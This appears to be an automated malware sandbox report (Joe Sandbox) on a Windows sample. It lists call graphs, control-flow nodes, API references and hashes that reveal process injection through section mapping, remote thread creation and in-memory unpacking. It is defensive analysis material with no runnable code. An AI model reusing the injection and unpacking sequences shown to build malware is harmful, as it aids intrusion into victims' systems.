3923->3930 3925 40b249 3925->3908 3927 40b159 3926->3927 3928 40b3aa 3926->3928 3927->3907 3928->3927 3929 40b3f5 SetStdHandle 3928->3929 3929->3927 3930->3925 3692 402e0b 3694 402e0e 3692->3694 3693 402e9c 3694->3693 3696 401869 3694->3696 3697 401877 3696->3697 3698 4018af Sleep 3697->3698 3699 4018ca 3698->3699 3701 4018db 3699->3701 3702 401493 3699->3702 3701->3693 3703 4014a2 3702->3703 3704 401543 NtDuplicateObject 3703->3704 3712 40165f 3703->3712 3705 401560 NtCreateSection 3704->3705 3704->3712 3706 4015e0 NtCreateSection 3705->3706 3707 401586 NtMapViewOfSection 3705->3707 3709 40160c 3706->3709 3706->3712 3707->3706 3708 4015a9 NtMapViewOfSection 3707->3708 3708->3706 3710 4015c7 3708->3710 3711 401616 NtMapViewOfSection 3709->3711 3709->3712 3710->3706 3711->3712 3713 40163d NtMapViewOfSection 3711->3713 3712->3701 3713->3712 3765 4a0001 3766 4a0005 3765->3766 3771 4a092b GetPEB 3766->3771 3768 4a0030 3773 4a003c 3768->3773 3772 4a0972 3771->3772 3772->3768 3774 4a0049 3773->3774 3775 4a0e0f 2 API calls 3774->3775 3776 4a0223 3775->3776 3777 4a0d90 GetPEB 3776->3777 3778 4a0238 VirtualAlloc 3777->3778 3779 4a0265 3778->3779 3780 4a02ce VirtualProtect 3779->3780 3781 4a030b 3780->3781 3782 4a0439 VirtualFree 3781->3782 3785 4a04be LoadLibraryA 3782->3785 3784 4a08c7 3785->3784 3786 4a0005 3787 4a092b GetPEB 3786->3787 3788 4a0030 3787->3788 3789 4a003c 7 API calls 3788->3789 3790 4a0038 3789->3790 3885 40b314 3886 40b332 __lseeki64_nolock 3885->3886 3887 40b34b SetFilePointer 3886->3887 3889 40b33a 3886->3889 3888 40b363 GetLastError 3887->3888 3887->3889 3888->3889 3668 402f55 3669 4030ac 3668->3669 3670 402f7f 3668->3670 3670->3669 3671 40303a RtlCreateUserThread 3670->3671 3672 403094 NtTerminateProcess 3671->3672 3672->3669 3714 536c0e 3715 536c1d 3714->3715 3718 5373ae 3715->3718 3719 5373c9 3718->3719 3720 5373d2 CreateToolhelp32Snapshot 3719->3720 3721 5373ee Module32First 3719->3721 3720->3719 3720->3721 3722 536c26 3721->3722 3723 5373fd 3721->3723 3725 53706d 3723->3725 3726 537098 3725->3726 3727 5370a9 VirtualAlloc 3726->3727 3728 5370e1 3726->3728 3727->3728 3803 402ee1 3804 402e69 3803->3804 3806 402e9c 3803->3806 3805 401869 8 API calls 3804->3805 3805->3806 3729 41aa64 3730 41aa70 LoadLibraryW 3729->3730 3739 41a5c0 VirtualProtect 3730->3739 3733 41aa9c 3734 41a730 10 API calls 3733->3734 3737 41aaa1 3734->3737 3735 41aab9 GlobalSize 3735->3737 3736 41aae3 InterlockedDecrement 3736->3737 3737->3735 3737->3736 3738 41aaf7 3737->3738 3739->3733 3825 40c2a5 3826 40c2bb 3825->3826 3827 40c2af 3825->3827 3827->3826 3828 40c2b4 CloseHandle 3827->3828 3828->3826 3881 402d69 3883 402d87 3881->3883 3882 401869 8 API calls 3884 402e9c 3882->3884 3883->3882 3883->3884 3835 4014aa 3836 4014a2 3835->3836 3837 401543 NtDuplicateObject 3836->3837 3845 40165f 3836->3845 3838 401560 NtCreateSection 3837->3838 3837->3845 3839 4015e0 NtCreateSection 3838->3839 3840 401586 NtMapViewOfSection 3838->3840 3842 40160c 3839->3842 3839->3845 3840->3839 3841 4015a9 NtMapViewOfSection 3840->3841 3841->3839 3843 4015c7 3841->3843 3844 401616 NtMapViewOfSection 3842->3844 3842->3845 3843->3839 3844->3845 3846 40163d NtMapViewOfSection 3844->3846 3846->3845 3871 4030b2 3872 4030c5 3871->3872 3873 403094 NtTerminateProcess 3872->3873 3875 4030d3 3872->3875 3874 4030ac 3873->3874 3875->3875 3740 401874 3741 401899 3740->3741 3742 4018af Sleep 3741->3742 3743 4018ca 3742->3743 3744 401493 7 API calls 3743->3744 3745 4018db 3743->3745 3744->3745 3876 41a6b4 3879 41a6c0 3876->3879 3877 41a660 FindNextChangeNotification 3877->3879 3878 41a6e9 GetComputerNameW 3878->3879 3879->3877 3879->3878 3880 41a702 3879->3880 3673 4a003c 3674 4a0049 3673->3674 3686 4a0e0f SetErrorMode SetErrorMode 3674->3686 3679 4a0265 3680 4a02ce VirtualProtect 3679->3680 3681 4a030b 3680->3681 3682 4a0439 VirtualFree 3681->3682 3685 4a04be LoadLibraryA 3682->3685 3684 4a08c7 3685->3684 3687 4a0223 3686->3687 3688 4a0d90 3687->3688 3689 4a0dad 3688->3689 3690 4a0dbb GetPEB 3689->3690 3691 4a0238 VirtualAlloc 3689->3691 3690->3691 3691->3679 3746 401476 3747 401422 3746->3747 3747->3746 3748 401543 NtDuplicateObject 3747->3748 3756 4013c0 3747->3756 3749 401560 NtCreateSection 3748->3749 3748->3756 3750 4015e0 NtCreateSection 3749->3750 3751 401586 NtMapViewOfSection 3749->3751 3753 40160c 3750->3753 3750->3756 3751->3750 3752 4015a9 NtMapViewOfSection 3751->3752 3752->3750 3754 4015c7 3752->3754 3755 401616 NtMapViewOfSection 3753->3755 3753->3756 3754->3750 3755->3756 3757 40163d NtMapViewOfSection 3755->3757 3757->3756 3758 40b27c 3759 40b290 3758->3759 3760 40b28b 3758->3760 3762 40b2a1 WriteConsoleW 3759->3762 3763 40b29a 3759->3763 3764 40c286 CreateFileW 3760->3764 3762->3763 3764->3759

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 41a7a0-41a7d0 1 41a7d3-41a7d8 0->1 2 41a7e0-41a7e6 1->2 3 41a7da 1->3 4 41a7f4-41a7fa 2->4 5 41a7e8-41a7ee 2->5 3->2 4->1 6 41a7fc-41a80a 4->6 5->4 7 41a810-41a816 6->7 8 41a822-41a828 7->8 9 41a818-41a81d 7->9 10 41a832-41a839 8->10 11 41a82a-41a82c 8->11 9->8 10->7 12 41a83b-41a83e 10->12 11->10 13 41a844-41a92f InterlockedExchange SetConsoleTitleA GlobalSize FindAtomW SearchPathW SetConsoleMode GetDefaultCommConfigW CopyFileExA GetEnvironmentStringsW WriteConsoleOutputW GetNumaNodeProcessorMask DebugActiveProcessStop GetUserDefaultLangID 12->13 14 41a977-41a983 12->14 22 41a931-41a936 RtlLeaveCriticalSection 13->22 23 41a93c-41a943 13->23 16 41a985-41a99e GetSystemTimes 14->16 20 41a9a0-41a9a7 16->20 21 41a9ab-41a9b2 16->21 20->16 24 41a9a9 20->24 25 41a9c4-41a9cc 21->25 26 41a9b4-41a9be FoldStringW 21->26 22->23 27 41a955-41a974 23->27 28 41a945-41a94f LoadLibraryA 23->28 24->25 29 41aa3a-41aa55 GlobalAlloc 25->29 30 41a9ce-41aa34 GetConsoleAliasesLengthA CallNamedPipeA GetComputerNameA GetConsoleAliasExesLengthW 25->30 26->25 27->14 28->27 31 41aa57-41aa62 29->31 32 41aa8c-41aa97 LoadLibraryW call 41a5c0 29->32 30->29 34 41aa70-41aa80 31->34 40 41aa9c-41aaaf call 41a730 32->40 38 41aa82 34->38 39 41aa87-41aa8a 34->39 38->39 39->32 39->34 45 41aab0-41aab7 40->45 48 41aab9-41aac9 GlobalSize 45->48 49 41aacd-41aad3 45->49 48->49 51 41aad5 call 41a5b0 49->51 52 41aada-41aae1 49->52 51->52 55 41aae3-41aae8 InterlockedDecrement 52->55 56 41aaee-41aaf5 52->56 55->56 56->45 58 41aaf7-41ab05 56->58 59 41ab07-41ab0c 58->59 61 41ab16-41ab1c 59->61 62 41ab0e-41ab14 59->62 61->59 63 41ab1e-41ab32 61->63 62->61 62->63
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 0041A84B
                                                • SetConsoleTitleA.KERNEL32(00000000), ref: 0041A853
                                                • GlobalSize.KERNEL32(00000000), ref: 0041A85B
                                                • FindAtomW.KERNEL32(00000000), ref: 0041A863
                                                • SearchPathW.KERNEL32(0041C9D0,0041C9A0,0041C960,00000000,?,?), ref: 0041A887
                                                • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A891
                                                • GetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041A8B9
                                                • CopyFileExA.KERNEL32(0041CA1C,0041CA0C,00000000,00000000,00000000,00000000), ref: 0041A8D1
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0041A8D7
                                                • WriteConsoleOutputW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0041A8F6
                                                • GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 0041A900
                                                • DebugActiveProcessStop.KERNEL32(00000000), ref: 0041A908
                                                • GetUserDefaultLangID.KERNEL32 ref: 0041A922
                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0041A936
                                                • LoadLibraryA.KERNEL32(00000000), ref: 0041A94F
                                                • GetSystemTimes.KERNELBASE(?,?,?), ref: 0041A996
                                                • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A9BE
                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041A9DD
                                                • CallNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A9EA
                                                • GetComputerNameA.KERNEL32(00000000,00000000), ref: 0041A9F2
                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 0041A9F8
                                                • GlobalAlloc.KERNELBASE(00000000,00421ECC), ref: 0041AA3D
                                                • LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
                                                • GlobalSize.KERNEL32(00000000), ref: 0041AABB
                                                • InterlockedDecrement.KERNEL32(?), ref: 0041AAE8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: Console$Global$DefaultInterlockedLengthLibraryLoadSize$ActiveAliasAliasesAllocAtomCallCommComputerConfigCopyCriticalDebugDecrementEnvironmentExchangeExesFileFindFoldLangLeaveMaskModeNameNamedNodeNumaOutputPathPipeProcessProcessorSearchSectionStopStringStringsSystemTimesTitleUserWrite
                                                • String ID: G9@$k`$}$
                                                • API String ID: 1617017930-167184026
                                                • Opcode ID: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
                                                • Instruction ID: 9d0e60e093157893049f9d09ff6ea3b3fc32bdf03ae3aab365a71fc4c352c97f
                                                • Opcode Fuzzy Hash: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
                                                • Instruction Fuzzy Hash: 8D913471645210ABD320AB60DC49BDB7BA4EF4C715F01803AF619A61F0DB785581CBEF

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 150 401476-401478 151 4014c0-4014ed call 40110f 150->151 152 401479-40147a 150->152 165 4014f2-4014f7 151->165 166 4014ef 151->166 153 401422 152->153 154 40147c-401481 152->154 157 4013c0-4013de call 40110f 153->157 158 401424-401451 153->158 159 401483-401490 154->159 168 4013f9-4013fa 157->168 167 401453-401470 158->167 158->168 175 401818-401820 165->175 176 4014fd-40150e 165->176 166->165 167->159 170 401472-401474 167->170 170->150 175->165 179 401514-40153d 176->179 180 401816-401825 176->180 179->180 190 401543-40155a NtDuplicateObject 179->190 182 401834 180->182 183 40182a-40184b 180->183 182->183 188 40183c-401847 183->188 189 40184e-401866 call 40110f 183->189 188->189 190->180 191 401560-401584 NtCreateSection 190->191 193 4015e0-401606 NtCreateSection 191->193 194 401586-4015a7 NtMapViewOfSection 191->194 193->180 197 40160c-401610 193->197 194->193 196 4015a9-4015c5 NtMapViewOfSection 194->196 196->193 199 4015c7-4015dd 196->199 197->180 200 401616-401637 NtMapViewOfSection 197->200 199->193 200->180 202 40163d-401659 NtMapViewOfSection 200->202 202->180 205 40165f call 401664 202->205
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
                                                • Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                • Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
                                                • Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                • Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 401493-4014c5 214 4014d7 207->214 215 4014cb-4014d3 207->215 214->215 216 4014da-4014ed call 40110f 214->216 215->216 219 4014f2-4014f7 216->219 220 4014ef 216->220 222 401818-401820 219->222 223 4014fd-40150e 219->223 220->219 222->219 226 401514-40153d 223->226 227 401816-401825 223->227 226->227 237 401543-40155a NtDuplicateObject 226->237 229 401834 227->229 230 40182a-40184b 227->230 229->230 235 40183c-401847 230->235 236 40184e-401866 call 40110f 230->236 235->236 237->227 238 401560-401584 NtCreateSection 237->238 240 4015e0-401606 NtCreateSection 238->240 241 401586-4015a7 NtMapViewOfSection 238->241 240->227 244 40160c-401610 240->244 241->240 243 4015a9-4015c5 NtMapViewOfSection 241->243 243->240 246 4015c7-4015dd 243->246 244->227 247 401616-401637 NtMapViewOfSection 244->247 246->240 247->227 249 40163d-401659 NtMapViewOfSection 247->249 249->227 252 40165f call 401664 249->252
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                • Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
                                                • Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                • Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 254 4014aa-4014c5 261 4014d7 254->261 262 4014cb-4014d3 254->262 261->262 263 4014da-4014ed call 40110f 261->263 262->263 266 4014f2-4014f7 263->266 267 4014ef 263->267 269 401818-401820 266->269 270 4014fd-40150e 266->270 267->266 269->266 273 401514-40153d 270->273 274 401816-401825 270->274 273->274 284 401543-40155a NtDuplicateObject 273->284 276 401834 274->276 277 40182a-40184b 274->277 276->277 282 40183c-401847 277->282 283 40184e-401866 call 40110f 277->283 282->283 284->274 285 401560-401584 NtCreateSection 284->285 287 4015e0-401606 NtCreateSection 285->287 288 401586-4015a7 NtMapViewOfSection 285->288 287->274 291 40160c-401610 287->291 288->287 290 4015a9-4015c5 NtMapViewOfSection 288->290 290->287 293 4015c7-4015dd 290->293 291->274 294 401616-401637 NtMapViewOfSection 291->294 293->287 294->274 296 40163d-401659 NtMapViewOfSection 294->296 296->274 299 40165f call 401664 296->299
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                • Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
                                                • Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                • Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 4014b1-4014ed call 40110f 306 4014f2-4014f7 301->306 307 4014ef 301->307 309 401818-401820 306->309 310 4014fd-40150e 306->310 307->306 309->306 313 401514-40153d 310->313 314 401816-401825 310->314 313->314 324 401543-40155a NtDuplicateObject 313->324 316 401834 314->316 317 40182a-40184b 314->317 316->317 322 40183c-401847 317->322 323 40184e-401866 call 40110f 317->323 322->323 324->314 325 401560-401584 NtCreateSection 324->325 327 4015e0-401606 NtCreateSection 325->327 328 401586-4015a7 NtMapViewOfSection 325->328 327->314 331 40160c-401610 327->331 328->327 330 4015a9-4015c5 NtMapViewOfSection 328->330 330->327 333 4015c7-4015dd 330->333 331->314 334 401616-401637 NtMapViewOfSection 331->334 333->327 334->314 336 40163d-401659 NtMapViewOfSection 334->336 336->314 339 40165f call 401664 336->339
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                • Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
                                                • Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                • Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 341 4014ad-4014c5 346 4014d7 341->346 347 4014cb-4014d3 341->347 346->347 348 4014da-4014ed call 40110f 346->348 347->348 351 4014f2-4014f7 348->351 352 4014ef 348->352 354 401818-401820 351->354 355 4014fd-40150e 351->355 352->351 354->351 358 401514-40153d 355->358 359 401816-401825 355->359 358->359 369 401543-40155a NtDuplicateObject 358->369 361 401834 359->361 362 40182a-40184b 359->362 361->362 367 40183c-401847 362->367 368 40184e-401866 call 40110f 362->368 367->368 369->359 370 401560-401584 NtCreateSection 369->370 372 4015e0-401606 NtCreateSection 370->372 373 401586-4015a7 NtMapViewOfSection 370->373 372->359 376 40160c-401610 372->376 373->372 375 4015a9-4015c5 NtMapViewOfSection 373->375 375->372 378 4015c7-4015dd 375->378 376->359 379 401616-401637 NtMapViewOfSection 376->379 378->372 379->359 381 40163d-401659 NtMapViewOfSection 379->381 381->359 384 40165f call 401664 381->384
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                • Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
                                                • Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                • Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 386 4014d5-4014ed call 40110f 390 4014f2-4014f7 386->390 391 4014ef 386->391 393 401818-401820 390->393 394 4014fd-40150e 390->394 391->390 393->390 397 401514-40153d 394->397 398 401816-401825 394->398 397->398 408 401543-40155a NtDuplicateObject 397->408 400 401834 398->400 401 40182a-40184b 398->401 400->401 406 40183c-401847 401->406 407 40184e-401866 call 40110f 401->407 406->407 408->398 409 401560-401584 NtCreateSection 408->409 411 4015e0-401606 NtCreateSection 409->411 412 401586-4015a7 NtMapViewOfSection 409->412 411->398 415 40160c-401610 411->415 412->411 414 4015a9-4015c5 NtMapViewOfSection 412->414 414->411 417 4015c7-4015dd 414->417 415->398 418 401616-401637 NtMapViewOfSection 415->418 417->411 418->398 420 40163d-401659 NtMapViewOfSection 418->420 420->398 423 40165f call 401664 420->423
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                • Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
                                                • Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                • Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 449 402f55-402f79 450 4030ac-4030b1 449->450 451 402f7f-402f97 449->451 451->450 452 402f9d-402fae 451->452 453 402fb0-402fb9 452->453 454 402fbe-402fcc 453->454 454->454 455 402fce-402fd5 454->455 456 402ff7-402ffe 455->456 457 402fd7-402ff6 455->457 458 403020-403023 456->458 459 403000-40301f 456->459 457->456 460 403025-403028 458->460 461 40302c 458->461 459->458 460->461 462 40302a 460->462 461->453 463 40302e-403033 461->463 462->463 463->450 464 403035-403038 463->464 464->450 465 40303a-4030a9 RtlCreateUserThread NtTerminateProcess 464->465 465->450
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 467 5373ae-5373c7 468 5373c9-5373cb 467->468 469 5373d2-5373de CreateToolhelp32Snapshot 468->469 470 5373cd 468->470 471 5373e0-5373e6 469->471 472 5373ee-5373fb Module32First 469->472 470->469 471->472 478 5373e8-5373ec 471->478 473 537404-53740c 472->473 474 5373fd-5373fe call 53706d 472->474 479 537403 474->479 478->468 478->472 479->473
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005373D6
                                                • Module32First.KERNEL32(00000000,00000224), ref: 005373F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Offset: 00534000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_534000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 6c17344ef653223332651af4f9b09b1ee1d0cc312e70c0f6ed1de93aa3090b3d
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: 2CF09C725047156BD7303BF5A88DB6E7BE8BF4D724F100568E652D14C0D770EC454A51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
